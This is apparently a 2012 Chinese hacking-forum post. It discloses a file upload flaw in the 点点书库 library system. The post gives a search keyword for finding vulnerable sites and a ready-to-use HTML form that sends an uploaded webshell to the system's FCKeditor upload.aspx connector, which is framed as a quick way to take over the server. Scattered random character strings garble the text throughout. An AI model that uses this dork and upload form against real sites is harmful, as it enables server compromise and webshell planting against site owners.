主题:图书馆系统任意文件上传漏洞5 J2 c" b% x4 n! k. ]
作者:冰锋刺客
6 b( U* R6 s; h i ~ 厂商:点击书(dianjishu.com)! v/ ? S% j4 S: @$ G
日期:2012-6-21
- [- y D' a- D 7 f8 |/ Y. O; U o
I 概述6 H: P6 D }' z% P' u; _
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell7 E6 C q" n# ~$ N1 g& C
II 简介
B D0 z: @+ ~4 ^" v; c4 H1 h+ n 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
& f9 l% ^1 ~' {/ n- }6 | 补充一个漏洞
8 X( O, M: u1 t/ ?# C( t6 j( T <form id="frmUpload" enctype="multipart/form-data"/ ?) e* C+ |5 g( d- J
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& y7 H1 o2 R1 A" j) u: X
<input id="btnUpload" type="submit" value="操翻他">% m1 M* \5 p" F+ R- s' c4 t
</form>+ n/ R+ d N0 z; a: b7 Y
你们懂的7 k* d9 X5 c: z9 [3 e' n
那傻逼提供还需要改包.7 X2 H- \$ N! n8 O& N7 x/ c
自己看了下源代码发现fckeditor
& K% R A0 V" Z6 i8 v; ] 直接秒杀
# j3 V" p. b' M$ A |
发表于 2012-9-10 21:20:59
收藏
支持
反对